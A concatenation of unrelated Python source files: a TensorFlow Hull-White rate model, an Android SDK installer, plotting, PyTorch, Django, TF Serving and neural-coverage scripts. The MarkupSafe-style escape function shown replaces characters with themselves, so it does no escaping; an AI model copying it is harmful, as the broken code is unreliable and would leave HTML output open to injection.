"""Returns zero-coupon bond prices `P(t,T)` conditional on `r(t)`.
Args:
short_rate: A `Tensor` of real dtype and shape `batch_shape + [dim]`
specifying the short rate `r(t)`.
times: A `Tensor` of real dtype and shape `batch_shape`. The time `t`
at which discount bond prices are computed.
maturities: A `Tensor` of real dtype and shape `batch_shape`. The time
to maturity of the discount bonds.
name: Str. The name to give this op.
Default value: `discount_bond_prices`.
Returns:
A `Tensor` of real dtype and the same shape as `batch_shape + [dim]`
containing the price of zero-coupon bonds.
"""
name = name or self._name + '_discount_bond_prices'
with tf.name_scope(name):
short_rate = tf.convert_to_tensor(short_rate, self._dtype)
times = tf.convert_to_tensor(times, self._dtype)
maturities = tf.convert_to_tensor(maturities, self._dtype)
# Flatten it because `PiecewiseConstantFunction` expects the first
# dimension to be broadcastable to [dim]
input_shape_times = times.shape.as_list()
times = tf.reshape(times, shape=[-1])
# The shape of `mean_reversion` will be (dim,n) where `n` is the number
# of elements in `times`.
mean_reversion = self._mean_reversion(times)
volatility = self._volatility(times)
y_t = self._compute_yt(times, mean_reversion, volatility)
times = tf.reshape(times, input_shape_times + [1])
maturities = tf.reshape(maturities, input_shape_times + [1])
mean_reversion = tf.reshape(tf.transpose(mean_reversion),
input_shape_times + [self._dim])
y_t = tf.reshape(tf.transpose(y_t), input_shape_times + [self._dim])
values = self._bond_reconstitution(
times, maturities, mean_reversion, short_rate, y_t)
return values
def _sample_paths(self,
times,
num_samples,
random_type,
skip,
seed):
"""Returns a sample of paths from the process."""
# Note: all the notations below are the same as in [1].
num_requested_times = times.shape[0]
params = [self._mean_reversion, self._volatility, self._corr_matrix]
if self._corr_matrix is not None:
params = params + [self._corr_matrix]
times, keep_mask = _prepare_grid(
times, params)
# Add zeros as a starting location
dt = times[1:] - times[:-1]
if dt.shape.is_fully_defined():
steps_num = dt.shape.as_list()[-1]
else:
steps_num = tf.shape(dt)[-1]
# TODO(b/148133811): Re-enable Sobol test when TF 2.2 is released.
if random_type == random.RandomType.SOBOL:
raise ValueError('Sobol sequence for Euler sampling is temporarily '
'unsupported when `time_step` or `times` have a '
'non-constant value')
# In order to use low-discrepancy random_type we need to generate the
# sequence of independent random normals upfront. We also precompute random
# numbers for stateless random type in order to ensure independent samples
# for multiple function calls whith different seeds.
if random_type in (random.RandomType.SOBOL,
random.RandomType.HALTON,
random.RandomType.HALTON_RANDOMIZED,
random.RandomType.STATELESS,
random.RandomType.STATELESS_ANTITHETIC):
normal_draws = utils.generate_mc_normal_draws(
num_normal_draws=self._dim, num_time_steps=steps_num,
num_sample_paths=num_samples, random_type=random_type,
seed=seed,
dtype=self._dtype, skip=skip)
else:
normal_draws = None
# The below is OK because we support exact discretization with piecewise
# constant mr and vol.
mean_reversion = self._mean_reversion(times)
volatility = self._volatility(times)
if self._corr_matrix is not None:
corr_matrix = _get_parameters(
times + tf.math.reduce_min(dt) / 2, self._corr_matrix)[0]
corr_matrix_root = tf.linalg.cholesky(corr_matrix)
else:
corr_matrix_root = None
exp_x_t = self._conditional_mean_x(times, mean_reversion, volatility)
var_x_t = self._conditional_variance_x(times, mean_reversion, volatility)
if self._dim == 1:
mean_reversion = tf.expand_dims(mean_reversion, axis=0)
cond_fn = lambda i, *args: i < tf.size(dt)
def body_fn(i, written_count,
current_x,
rate_paths):
"""Simulate hull-white process to the next time point."""
if normal_draws is None:
normals = random.mv_normal_sample(
(num_samples,),
mean=tf.zeros((self._dim,), dtype=mean_reversion.dtype),
random_type=random_type, seed=seed)
else:
normals = normal_draws[i]
if corr_matrix_root is not None:
normals = tf.linalg.matvec(corr_matrix_root[i], normals)
next_x = (tf.math.exp(-mean_reversion[:, i + 1] * dt[i]) * current_x
+ exp_x_t[:, i] + tf.math.sqrt(var_x_t[:, i]) * normals)
f_0_t = self._instant_forward_rate_fn(times[i + 1])
# Update `rate_paths`
rate_paths = utils.maybe_update_along_axis(
tensor=rate_paths,
do_update=keep_mask[i + 1],
ind=written_count,
axis=1,
new_tensor=tf.expand_dims(next_x, axis=1) + f_0_t)
written_count += tf.cast(keep_mask[i + 1], dtype=tf.int32)
return (i + 1, written_count, next_x, rate_paths)
rate_paths = tf.zeros((num_samples, num_requested_times, self._dim),
dtype=self._dtype)
initial_x = tf.zeros((num_samples, self._dim), dtype=self._dtype)
# TODO(b/157232803): Use tf.cumsum instead?
_, _, _, rate_paths = tf.while_loop(
cond_fn, body_fn, (0, 0, initial_x, rate_paths))
return rate_paths
def _bond_reconstitution(self,
times,
maturities,
mean_reversion,
short_rate,
y_t):
"""Compute discount bond prices using Eq. 10.18 in Ref [2]."""
f_0_t = self._instant_forward_rate_fn(times)
x_t = short_rate - f_0_t
p_0_t = tf.math.exp(-self._initial_discount_rate_fn(times) * times)
p_0_t_tau = tf.math.exp(
-self._initial_discount_rate_fn(maturities) *
(maturities)) / p_0_t
g_t_tau = (1. - tf.math.exp(
-mean_reversion * (maturities - times))) / mean_reversion
term1 = x_t * g_t_tau
term2 = y_t * g_t_tau**2
p_t_tau = p_0_t_tau * tf.math.exp(-term1 - 0.5 * term2)
return p_t_tau
def _exact_discretization_setup(self, dim):
"""Initial setup for efficient computations."""
self._zero_padding = tf.zeros((dim, 1), dtype=self._dtype)
self._jump_locations = tf.concat(
[self._volatility.jump_locations(),
self._mean_reversion.jump_locations()], axis=-1)
self._jump_values_vol = self._volatility(self._jump_locations)
self._jump_values_mr = self._mean_reversion(self._jump_locations)
if dim == 1:
self._padded_knots = tf.concat([
self._zero_padding,
tf.expand_dims(self._jump_locations[:-1], axis=0)
], axis=1)
self._jump_values_vol = tf.expand_dims(self._jump_values_vol, axis=0)
self._jump_values_mr = tf.expand_dims(self._jump_values_mr, axis=0)
self._jump_locations = tf.expand_dims(self._jump_locations, axis=0)
else:
self._padded_knots = tf.concat(
[self._zero_padding, self._jump_locations[:, :-1]], axis=1)
def _compute_yt(self, t, mr_t, sigma_t):
"""Computes y(t) as described in [1], section 10.1.6.1."""
t = tf.repeat(tf.expand_dims(t, axis=0), self._dim, axis=0)
time_index = tf.searchsorted(self._jump_locations, t)
y_between_vol_knots = self._y_integral(
self._padded_knots, self._jump_locations, self._jump_values_vol,
self._jump_values_mr)
y_at_vol_knots = tf.concat(
[self._zero_padding,
_cumsum_using_matvec(y_between_vol_knots)], axis=1)
vn = tf.concat(
[self._zero_padding, self._jump_locations], axis=1)
y_t = self._y_integral(
tf.gather(vn, time_index, batch_dims=1), t, sigma_t, mr_t)
y_t = y_t + tf.gather(y_at_vol_knots, time_index, batch_dims=1)
return tf.math.exp(-2 * mr_t * t) * y_t
def _conditional_mean_x(self, t, mr_t, sigma_t):
"""Computes the drift term in [1], Eq. 10.39."""
t = tf.repeat(tf.expand_dims(t, axis=0), self._dim, axis=0)
time_index = tf.searchsorted(self._jump_locations, t)
vn = tf.concat([self._zero_padding, self._jump_locations], axis=1)
y_between_vol_knots = self._y_integral(self._padded_knots,
self._jump_locations,
self._jump_values_vol,
self._jump_values_mr)
y_at_vol_knots = tf.concat(
[self._zero_padding,
_cumsum_using_matvec(y_between_vol_knots)], axis=1)
ex_between_vol_knots = self._ex_integral(self._padded_knots,
self._jump_locations,
self._jump_values_vol,
self._jump_values_mr,
y_at_vol_knots[:, :-1])
ex_at_vol_knots = tf.concat(
[self._zero_padding,
_cumsum_using_matvec(ex_between_vol_knots)], axis=1)
c = tf.gather(y_at_vol_knots, time_index, batch_dims=1)
exp_x_t = self._ex_integral(
tf.gather(vn, time_index, batch_dims=1), t, sigma_t, mr_t, c)
exp_x_t = exp_x_t + tf.gather(ex_at_vol_knots, time_index, batch_dims=1)
exp_x_t = (exp_x_t[:, 1:] - exp_x_t[:, :-1]) * tf.math.exp(
-tf.broadcast_to(mr_t, t.shape)[:, 1:] * t[:, 1:])
return exp_x_t
def _y_integral(self, t0, t, vol, k):
"""Computes int_t0^t sigma(u)^2 exp(2*k*u) du."""
return (vol * vol) / (2 * k) * (
tf.math.exp(2 * k * t) - tf.math.exp(2 * k * t0))
def _ex_integral(self, t0, t, vol, k, y_t0):
"""Function computes the integral for the drift calculation."""
# Computes int_t0^t (exp(k*s)*y(s)) ds,
# where y(s)=y(t0) + int_t0^s exp(-2*(s-u)) vol(u)^2 du."""
value = (
tf.math.exp(k * t) - tf.math.exp(k * t0) + tf.math.exp(2 * k * t0) *
(tf.math.exp(-k * t) - tf.math.exp(-k * t0)))
value = value * vol**2 / (2 * k * k) + y_t0 * (tf.math.exp(-k * t0) -
tf.math.exp(-k * t)) / k
return value
def _conditional_variance_x(self, t, mr_t, sigma_t):
"""Computes the variance of x(t), see [1], Eq. 10.41."""
t = tf.repeat(tf.expand_dims(t, axis=0), self._dim, axis=0)
var_x_between_vol_knots = self._variance_int(self._padded_knots,
self._jump_locations,
self._jump_values_vol,
self._jump_values_mr)
varx_at_vol_knots = tf.concat(
[self._zero_padding,
_cumsum_using_matvec(var_x_between_vol_knots)],
axis=1)
time_index = tf.searchsorted(self._jump_locations, t)
vn = tf.concat(
[self._zero_padding,
self._jump_locations], axis=1)
var_x_t = self._variance_int(
tf.gather(vn, time_index, batch_dims=1), t, sigma_t, mr_t)
var_x_t = var_x_t + tf.gather(varx_at_vol_knots, time_index, batch_dims=1)
var_x_t = (var_x_t[:, 1:] - var_x_t[:, :-1]) * tf.math.exp(
-2 * tf.broadcast_to(mr_t, t.shape)[:, 1:] * t[:, 1:])
return var_x_t
def _variance_int(self, t0, t, vol, k):
"""Computes int_t0^t exp(2*k*s) vol(s)^2 ds."""
return vol * vol / (2 * k) * (
tf.math.exp(2 * k * t) - tf.math.exp(2 * k * t0))
def _get_parameters(times, *params):
"""Gets parameter values at at specified `times`."""
res = []
for param in params:
if isinstance(param, piecewise.PiecewiseConstantFunc):
jump_locations = param.jump_locations()
if len(jump_locations.shape) > 1:
# If `jump_locations` has batch dimension, transpose the result
# Shape [num_times, dim]
res.append(tf.transpose(param(times)))
else:
# Shape [num_times, dim]
res.append(param(times))
elif callable(param):
# Used only in drift and volatility computation.
# Here `times` is of shape [1]
t = tf.squeeze(times)
# The result has to have shape [1] + param.shape
res.append(tf.expand_dims(param(t), 0))
else:
res.append(param + tf.zeros(times.shape + param.shape, dtype=times.dtype))
return res
def _prepare_grid(times, *params):
"""Prepares grid of times for path generation.
Args:
times: Rank 1 `Tensor` of increasing positive real values. The times at
which the path points are to be evaluated.
*params: Parameters of the Heston model. Either scalar `Tensor`s of the
same `dtype` or instances of `PiecewiseConstantFunc`.
Returns:
Tuple `(all_times, mask)`.
`all_times` is a 1-D real `Tensor` containing all points from 'times`, the
uniform grid of points between `[0, times[-1]]` with grid size equal to
`time_step`, and jump locations of piecewise constant parameters The
`Tensor` is sorted in ascending order and may contain duplicates.
`mask` is a boolean 1-D `Tensor` of the same shape as 'all_times', showing
which elements of 'all_times' correspond to THE values from `times`.
Guarantees that times[0]=0 and mask[0]=False.
"""
additional_times = []
for param in params:
if hasattr(param, 'is_piecewise_constant'):
if param.is_piecewise_constant:
# Flatten all jump locations
additional_times.append(tf.reshape(param.jump_locations(), [-1]))
zeros = tf.constant([0], dtype=times.dtype)
all_times = tf.concat([zeros] + [times] + additional_times, axis=0)
additional_times_mask = [
tf.zeros_like(times, dtype=tf.bool) for times in additional_times]
mask = tf.concat([
tf.cast(zeros, dtype=tf.bool),
tf.ones_like(times, dtype=tf.bool)
] + additional_times_mask, axis=0)
perm = tf.argsort(all_times, stable=True)
all_times = tf.gather(all_times, perm)
mask = tf.gather(mask, perm)
return all_times, mask
def _input_type(param, dim, dtype, name):
"""Checks if the input parameter is a callable or piecewise constant."""
# If the parameter is callable but not a piecewise constant use
# generic sampling method (e.g., Euler).
sample_with_generic = False
if hasattr(param, 'is_piecewise_constant'):
if param.is_piecewise_constant:
jumps_shape = param.jump_locations().shape
if len(jumps_shape) > 2:
raise ValueError(
'Batch rank of `jump_locations` should be `1` for all piecewise '
'constant arguments but {} instead'.format(len(jumps_shape[:-1])))
if len(jumps_shape) == 2:
if dim != jumps_shape[0]:
raise ValueError(
'Batch shape of `jump_locations` should be either empty or '
'`[{0}]` but `[{1}]` instead'.format(dim, jumps_shape[0]))
if name == 'mean_reversion' and jumps_shape[0] > 0:
# Exact discretization currently not supported with time-dependent mr
sample_with_generic = True
return param, sample_with_generic
else:
sample_with_generic = True
elif callable(param):
sample_with_generic = True
else:
# Otherwise, input is a `Tensor`, return a `PiecewiseConstantFunc`.
param = tf.convert_to_tensor(param, dtype=dtype, name=name)
param_shape = param.shape.as_list()
param_rank = param.shape.rank
if param_shape[-1] != dim:
# This is an error, we need as many parameters as the number of `dim`
raise ValueError(
'Length of {} ({}) should be the same as `dims`({}).'.format(
name, param_shape[0], dim))
if param_rank == 2:
# This is when the parameter is a correlation matrix
jump_locations = []
values = tf.expand_dims(param, axis=0)
else:
jump_locations = [] if dim == 1 else [[]] * dim
values = param if dim == 1 else tf.expand_dims(param, axis=-1)
param = piecewise.PiecewiseConstantFunc(
jump_locations=jump_locations, values=values,
dtype=dtype)
return param, sample_with_generic
def _cumsum_using_matvec(input_tensor):
"""Computes cumsum using matrix algebra."""
dtype = input_tensor.dtype
axis_length = input_tensor.shape.as_list()[-1]
ones = tf.ones([axis_length, axis_length], dtype=dtype)
lower_triangular = tf.linalg.band_part(ones, -1, 0)
cumsum = tf.linalg.matvec(lower_triangular, input_tensor)
return cumsum
|
the-stack_0_6115 | #!/usr/bin/env python
'''
aaa
'''
import os
import urllib
import zipfile
import platform
import sys
import subprocess
import tempfile
import argparse
from retry import retry
DIR_PATH = os.path.dirname(os.path.realpath(__file__))
COCOS2D_X = os.path.abspath(os.path.join(DIR_PATH, "../.."))
# ROOT_DIR/cocos2d-x
ROOT_DIR = os.path.abspath(os.path.join(COCOS2D_X, ".."))
ANDROID_NDK = os.path.join(ROOT_DIR, "android-ndk-r16b")
ANDROID_SDK = os.path.join(ROOT_DIR, "android-sdk")
SDK_MANAGER = os.path.join(ROOT_DIR, "sdk_tools/tools/bin/sdkmanager")
SYSTEM = platform.system().lower()
if SYSTEM == "windows":
SDK_MANAGER = SDK_MANAGER + ".bat"
def run(command):
print("=" * 80)
print(command)
subprocess.check_call(command.split())
def run_with_yes(command):
print("=" * 80)
print("yes|" + command)
f = tempfile.TemporaryFile("w")
repeat_yes = 50
f.write("y\n" * repeat_yes)
f.seek(0)
subprocess.check_call(command.split(), stdin=f)
def unzip(zip_file, directory):
print("=" * 80)
print("Unzip: " + zip_file + " to " + directory)
if SYSTEM == "windows":
zipfile.ZipFile(zip_file).extractall(directory)
else:
# module zipfile ignore priviliges i.e. +x
cmd = "unzip -d " + directory + " " + zip_file
subprocess.check_output(cmd.split())
def download(url, zip_file):
print("=" * 80)
print("Download: " + url + ", file: " + zip_file)
try:
os.remove(zip_file)
except OSError:
pass
urllib.urlretrieve(url, zip_file)
@retry(Exception, tries=5, delay=1, backoff=1)
def install_android_ndk():
file_name = "android-ndk-r16b-" + SYSTEM + "-x86_64.zip"
url = "https://dl.google.com/android/repository/" + file_name
zip_file = os.path.abspath(os.path.join(ROOT_DIR, file_name))
download(url, zip_file)
unzip(zip_file, ROOT_DIR)
@retry(Exception, tries=5, delay=1, backoff=1)
def install_android_sdk_tools():
file_name = "sdk-tools-{system}-3859397.zip".format(
system=platform.system().lower())
url = "https://dl.google.com/android/repository/" + file_name
zip_file = os.path.abspath(os.path.join(ROOT_DIR, file_name))
download(url, zip_file)
unzip(zip_file, os.path.join(ROOT_DIR, "sdk_tools"))
@retry(Exception, tries=5, delay=1, backoff=1)
def install_android_sdk():
switches = " --verbose --sdk_root=" + ANDROID_SDK + " "
cmd1 = SDK_MANAGER + switches
packages = [
"platforms;android-27",
"build-tools;28.0.3",
"platform-tools",
"tools"
]
cmd = cmd1 + " ".join(packages)
run_with_yes(cmd)
def export_environment(ndk_only):
with open(os.path.join(ROOT_DIR, "environment.sh"), "a") as myfile:
if not ndk_only:
myfile.write("export ANDROID_HOME=" + ANDROID_SDK + "\n")
myfile.write("export ANDROID_SDK_ROOT=" + ANDROID_SDK + "\n")
myfile.write("export ANDROID_NDK_HOME=" + ANDROID_NDK + "\n")
myfile.write("export NDK_ROOT=" + ANDROID_NDK + "\n")
with open(os.path.join(ROOT_DIR, "environment.ps1"), "a") as myfile:
if not ndk_only:
myfile.write("$env:ANDROID_HOME=\"" + ANDROID_SDK + "\"\n")
myfile.write("$env:ANDROID_SDK_ROOT=\"" + ANDROID_SDK + "\"\n")
myfile.write("$env:ANDROID_NDK_HOME=\"" + ANDROID_NDK + "\"\n")
myfile.write("$env:NDK_ROOT=\"" + ANDROID_NDK + "\"\n")
def main(ndk_only):
if not ndk_only:
install_android_sdk_tools()
install_android_sdk()
install_android_ndk()
export_environment(ndk_only)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Install android sdk/ndk')
parser.add_argument("--ndk_only", help="Install ndk only", action="store_true")
args = parser.parse_args()
main(args.ndk_only)
|
the-stack_0_6116 | #!/usr/bin/env python
# coding: utf-8
"""
Plot Fig.3 from paper.
"""
from __future__ import print_function, unicode_literals
import os
import sys
import matplotlib
matplotlib.use('Agg')
import matplotlib.gridspec as gridspec
import matplotlib.pyplot as plt
import numpy as np
import scipy.special
import progressbar
sys.path.insert(
0,
os.path.abspath(os.path.join(
os.path.dirname(os.path.realpath(__file__)),
'..'
))
)
from simus import custom_mpl
from simus import floquet
from simus import operators
from simus import tools
def RWA_frequency(n_bar, data):
"""
Compute the ac Stark shifted frequency using the time-averaged model.
"""
epsilon_p = operators.compute_epsilon_p(n_bar, data['params'])
H_shunted, args, _, _ = operators.build_shunted_hamiltonian(
data['N_max_a'], data['N_max_b'], epsilon_p, data['params']
)
# Compute the time-averaged hamiltonian
H = (
H_shunted[0] +
scipy.special.jv(0, args['oscillating_prefactor']) * H_shunted[1][0]
)
# ac Stark shifted frequency can be computed through the difference of
# eigenenergies
eigv = H.eigenenergies()
return (eigv[2] - eigv[0]) / (2 * np.pi)
def main(out_directory, overlaps_threshold):
"""
Main entry point for this script.
:param out_directory: Directory to load dumps from. Typically
``out/shunted_final_params``.
:param overlaps_threshold: Absolute threshold for selecting a frequency.
"""
# Load data
(
loaded_data,
max_N_max_a, max_N_max_b,
omega_a, omega_p,
kerr, f_0
) = tools.load_data(out_directory)
# Compute omega_bar_a from any n_bar value
any_n_bar = next(iter(loaded_data))
omega_bar_a = operators.compute_shunted_parameters(
operators.compute_epsilon_p(
any_n_bar,
loaded_data[any_n_bar]['params']
),
loaded_data[any_n_bar]['params']
)[0]
# Data to plot
frequencies = [] # This is a list of dicts, see below
RWA_frequencies = []
transmon_populations = np.zeros((max_N_max_b, len(loaded_data.keys())))
mean_transmon_excitations, purities = [], []
bar = progressbar.ProgressBar(max_value=len(loaded_data.keys()))
for y, (n_bar, data) in bar(enumerate(loaded_data.items())):
frequencies.extend(
tools.find_frequencies_from_overlaps(
n_bar, data, overlaps_threshold
)
)
RWA_frequencies.append(RWA_frequency(n_bar, data))
# Write steadystate in real tensor space
real_ss = floquet.floquet_basis_transform(
data['f_modes_0'], data['steadystate']
)
# Compute transmon populations
transmon_populations[:data['N_max_b'], y] = np.abs(
real_ss.ptrace(1).diag()
)
mean_transmon_excitations.append(np.sum([
k * pop
for k, pop in enumerate(transmon_populations[:data['N_max_b'], y])
]))
# Compute purities
purities.append(np.sum(data['steadystate'].diag()**2))
# Plot everything
with plt.rc_context(rc=custom_mpl.custom_rc()):
fig = plt.figure(figsize=(15, 15))
# Define grid
gs = gridspec.GridSpec(3, 1, height_ratios=[0.05, 1, 1])
colorbar_axis = fig.add_subplot(gs[0, :])
transmon_pops_axis = fig.add_subplot(gs[1, 0])
frequencies_axis = fig.add_subplot(gs[-1, 0],
sharex=transmon_pops_axis)
# Disable ticks on shared axes
plt.setp(transmon_pops_axis.get_xticklabels(), visible=False)
# Plot transmon populations
colorbar = tools.plot_article_pops(
loaded_data.keys(), range(max_N_max_b), transmon_populations,
transmon_pops_axis,
ylabel="Transmon eigenstates",
eyeguide=mean_transmon_excitations,
eyeguide_color=custom_mpl.PALETTE[7],
threshold=None
)
fig.colorbar(colorbar, cax=colorbar_axis, orientation="horizontal")
# Plot purities on the right axis
purities_axis = transmon_pops_axis.twinx()
purities_axis.plot(
loaded_data.keys(),
purities,
color=custom_mpl.PALETTE[0],
linewidth=3.0
)
purities_axis.set_ylim((0, 1))
purities_axis.set_ylabel(
r"$\mathrm{Tr}\left[\rho_{\mathrm{ss}}(0)^2\right]$"
)
# Plot found frequencies
frequencies_axis.plot(
loaded_data.keys(),
[omega_bar_a / (2 * np.pi) for x in loaded_data.keys()],
color=custom_mpl.PALETTE[1],
zorder=1
)
frequencies_axis.plot(
loaded_data.keys(),
RWA_frequencies,
color=custom_mpl.PALETTE[3],
linewidth=3.0,
zorder=2
)
for point in frequencies:
frequencies_axis.scatter(
point['n_bar'],
point['frequency'],
s=point['area'],
color=custom_mpl.PALETTE[0],
zorder=3
)
frequencies_axis.set_ylim((np.min(RWA_frequencies) - 5e-3, f_0 + 5e-3))
frequencies_axis.set_ylabel(r'$\omega_{\mathrm{ac}} / 2 \pi$ (in GHz)')
# Set X axis label
frequencies_axis.set_xlabel(
r'$\left|a_p\right|^2 / '
r'\left[4 \left|\omega_p - \omega_a\right|^2\right] '
r'\approx \bar{n}$'
)
for ax in [transmon_pops_axis, purities_axis, frequencies_axis]:
ax.margins(x=0.01)
ax.xaxis.set_minor_locator(matplotlib.ticker.AutoMinorLocator(n=2))
ax.yaxis.set_minor_locator(matplotlib.ticker.AutoMinorLocator(n=2))
# Save figure
fig.tight_layout()
fig.savefig(os.path.join(out_directory, 'fig3.pdf'))
if __name__ == "__main__":
if len(sys.argv) < 2:
sys.exit(
'Usage: %s OUT_DIRECTORY [OVERLAPS_THRESHOLD]' %
sys.argv[0]
)
out_directory = sys.argv[1]
overlaps_threshold = 0.1
if len(sys.argv) > 2:
overlaps_threshold = float(sys.argv[2])
main(out_directory, overlaps_threshold)
|
the-stack_0_6119 | # Time complexity: O(m*n)
# Approach: DP Solution (https://www.geeksforgeeks.org/count-distinct-occurrences-as-a-subsequence/)
class Solution:
def numDistinct(self, s: str, t: str) -> int:
m, n = len(t), len(s)
if m>n:
return 0
dp = [[0]*(n+1) for i in range(m+1)]
for i in range(m+1):
dp[i][0] = 0
for i in range(n+1):
dp[0][i] = 1
for i in range(1, m+1):
for j in range(1, n+1):
if t[i-1]==s[j-1]:
dp[i][j] = dp[i][j-1]+dp[i-1][j-1]
else:
dp[i][j] = dp[i][j-1]
return dp[m][n] |
the-stack_0_6120 | import tensorflow as tf
import grpc
from tensorflow_serving.apis import prediction_service_pb2_grpc, predict_pb2
model_name = "address"
host = "10.100.51.111"
port = 8090
timeout = 10.0
channel = grpc.insecure_channel("%s:%d" % (host, port))
stub = prediction_service_pb2_grpc.PredictionServiceStub(channel)
def send_request(batch_tokens):
batch_tokens, lengths, max_length = pad_batch(batch_tokens)
batch_size = len(lengths)
request = predict_pb2.PredictRequest()
request.model_spec.name = model_name
request.inputs["tokens"].CopyFrom(
tf.make_tensor_proto([batch_tokens], shape=(batch_size, max_length)))
request.inputs["length"].CopyFrom(
tf.make_tensor_proto(lengths, shape=(batch_size,)))
future = stub.Predict.future(request, timeout)
batch_output = parse_translation_result(future.result())
batch_output = parse_result_to_utf8_text(batch_output)
return batch_output
def parse_translation_result(result):
batch_predictions = tf.make_ndarray(result.outputs["tokens"])
batch_lengths = tf.make_ndarray(result.outputs["length"])
for hypotheses, lengths in zip(batch_predictions, batch_lengths):
best_hypothesis = hypotheses[0]
best_length = lengths[0] - 1
yield best_hypothesis[:best_length]
def parse_result_to_utf8_text(results):
batch_output = []
for result in results:
tokens = []
for r in list(result):
tokens.append(str(r, encoding='utf8'))
batch_output.append(tokens)
return batch_output
def pad_batch(batch_tokens):
lengths = [len(address) for address in batch_tokens]
max_lengths = max(lengths)
for tokens, length in zip(batch_tokens, lengths):
if max_lengths > length:
tokens += [""] * (max_lengths - length)
return batch_tokens, lengths, max_lengths
if __name__ == "__main__":
# address = ['土', '悔', '市', '浦', '东', '新', '区', '张', '栋', '路', '1387', '号']
addresses = [['土悔市', '浦东新区', '张栋路', '1387', '号'],
['土悔市', '浦东新区', '章东路'],
['土悔市', '浦A新区']]
result = send_request(addresses)
print(result)
|
the-stack_0_6121 | import typing as t
from . import Markup
def escape(s: t.Any) -> Markup:
"""Replace the characters ``&``, ``<``, ``>``, ``'``, and ``"`` in
the string with HTML-safe sequences. Use this if you need to display
text that might contain such characters in HTML.
If the object has an ``__html__`` method, it is called and the
return value is assumed to already be safe for HTML.
:param s: An object to be converted to a string and escaped.
:return: A :class:`Markup` string with the escaped text.
"""
if hasattr(s, "__html__"):
return Markup(s.__html__())
return Markup(
str(s)
.replace("&", "&")
.replace(">", ">")
.replace("<", "<")
.replace("'", "'")
.replace('"', """)
)
def escape_silent(s: t.Optional[t.Any]) -> Markup:
"""Like :func:`escape` but treats ``None`` as the empty string.
Useful with optional values, as otherwise you get the string
``'None'`` when the value is ``None``.
>>> escape(None)
Markup('None')
>>> escape_silent(None)
Markup('')
"""
if s is None:
return Markup()
return escape(s)
def soft_str(s: t.Any) -> str:
"""Convert an object to a string if it isn't already. This preserves
a :class:`Markup` string rather than converting it back to a basic
string, so it will still be marked as safe and won't be escaped
again.
>>> value = escape("<User 1>")
>>> value
Markup('<User 1>')
>>> escape(str(value))
Markup('&lt;User 1&gt;')
>>> escape(soft_str(value))
Markup('<User 1>')
"""
if not isinstance(s, str):
return str(s)
return s
def soft_unicode(s: t.Any) -> str:
import warnings
warnings.warn(
"'soft_unicode' has been renamed to 'soft_str'. The old name"
" will be removed in version 2.1.",
DeprecationWarning,
stacklevel=2,
)
return soft_str(s)
|
the-stack_0_6123 | # -*- coding: utf-8 -*-
"""
Created on Sun Jul 5 11:00:05 2020
@author: hto_r
"""
import torch
from torchvision import datasets, transforms , models
from torch import nn, optim
import torch.nn.functional as F
def DL_model (HL_1, HL_2, Activation_function, dropout):
""" Function to define a simple 2 hidden layer Neural network
args:
HL_1: int with the dimension of the first hidden layer
HL_2: int with the dimension of the second hidden layer
Activation_function: string with an activation
function recognized by pytorch
dropout: float, probability to dropout every neuron before each layer
returns
pytorch model
"""
device =torch.device ("cuda" if torch.cuda.is_available() else "cpu")
if Activation_function =='relu':
model=DL_model_relu_2HL(HL_1, HL_2, dropout)
model.to(device)
return(model)
def DL_model_relu_2HL (HL_1, HL_2, dropout=0.2):
""" Function to define a simple 2 hidden layer Neural network
args:
HL_1: int with the dimension of the first hidden layer
HL_2: int with the dimension of the second hidden layer
dropout: float, probability to dropout every neuron before each layer
returns
pytorch model
"""
device =torch.device ("cuda" if torch.cuda.is_available() else "cpu")
class Grainsize_model (nn.Module):
def __init__(self):
super().__init__()
self.fc1 = nn.Linear(50**2*3, HL_1)
self.fc2 = nn.Linear(HL_1, HL_2)
self.fc3 = nn.Linear(HL_2, 100)
self.fc4 = nn.Linear(100, 4)
self.Dropout = nn. Dropout(p=dropout)
def forward (self, x):
x= x.view(x.shape[0], -1)
x= self.Dropout(F.relu(self.fc1(x)))
x= self.Dropout(F.relu(self.fc2(x)))
x= self.Dropout(F.relu(self.fc3(x)))
x= F.log_softmax(self.fc4(x), dim=1)
return x
model= Grainsize_model()
model.to(device)
return model |
the-stack_0_6124 | from django.urls import path, include
from profiles_api_app import views
from rest_framework.routers import DefaultRouter
#definig a router
router = DefaultRouter()
router.register('HelloViewSet/', views.HelloViewSet, base_name='HelloViewSet')
router.register('profile/', views.UserProfileViewSet)
urlpatterns = [
path('HelloApiView/', views.HelloApiView.as_view()),
path('', include(router.urls)),
]
|
the-stack_0_6125 | from __future__ import print_function
import argparse
import keras
import os
import sys
from keras import models
from keras.models import load_model, Model
from keras.datasets import mnist
from keras.layers import Input
from scipy.misc import imsave
from copy import deepcopy
import random
import matplotlib.pyplot as plt
import seaborn as sns
import numpy as np
import pandas as pd
from vgg16_CIFAR10 import cifar10vgg
plt.style.use('classic')
from utils import *
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
#calculates the orthant coverage of a certain dataset
def calculate_nth_layer_orthant_coverage(model, test_corpus, model_layer_dict, layer, mean_vector, covariance_matrix, group_size, threshold):
shortened_model = create_shortened_model(model, layer)
for input_path in test_corpus:
#load image
input = preprocess_image(input_path)
#calculate the covereage by updating a layer_output
update_orthant_coverage(input, shortened_model, model_layer_dict,
mean_vector, covariance_matrix, group_size, threshold)
return get_orthant_coverage(model_layer_dict)
def calculate_neuron_coverge(model, test_corpus, model_layer_dict, threshold):
for input_path in test_corpus:
#load image
input = preprocess_image(input_path)
update_neuron_coverage(input, model, model_layer_dict, threshold)
return get_neuron_coverage(model_layer_dict)
if __name__ == "__main__":
model_path = "LeNet-5_200_Epochs.h5"
covariance_matrix_path = "LeNet-5_200_Epochs_6th_layer_data.npycovarianceArray.npy"
mean_vector_path = "LeNet-5_200_Epochs_6th_layer_data.npymean.npy"
base_set_path = "inputs/base_set/cifar10_base_set.npy"
bim_set_path = "inputs/bim/cifar10_bim.npy"
try:#load mean vector and cov array
mean_vector = np.load(mean_vector_path)
covariance_matrix = np.load(covariance_matrix_path)
base_set = np.load(base_set_path)
bim_set = np.load(bim_set_path)
except:
print("FileLoad Error: cannot load mean vector or covariance matrix array")
sys.exit()
inputs_path = "inputs"
threshold = 0.7
group_size = 1
model_name = "cifar10_vgg16"
attack_name = "bim"
vgg = cifar10vgg(train=False)
model = vgg.model
corpus = [input for input in base_set.tolist()]
corpus_len = len(corpus)
base_model_layer_dict = init_neuron_coverage_table(model)
#this vector will be used to plot a graph later
initial_coverage_vector = [calculate_neuron_coverge(model, corpus_paths, base_model_layer_dict, threshold)[2]]
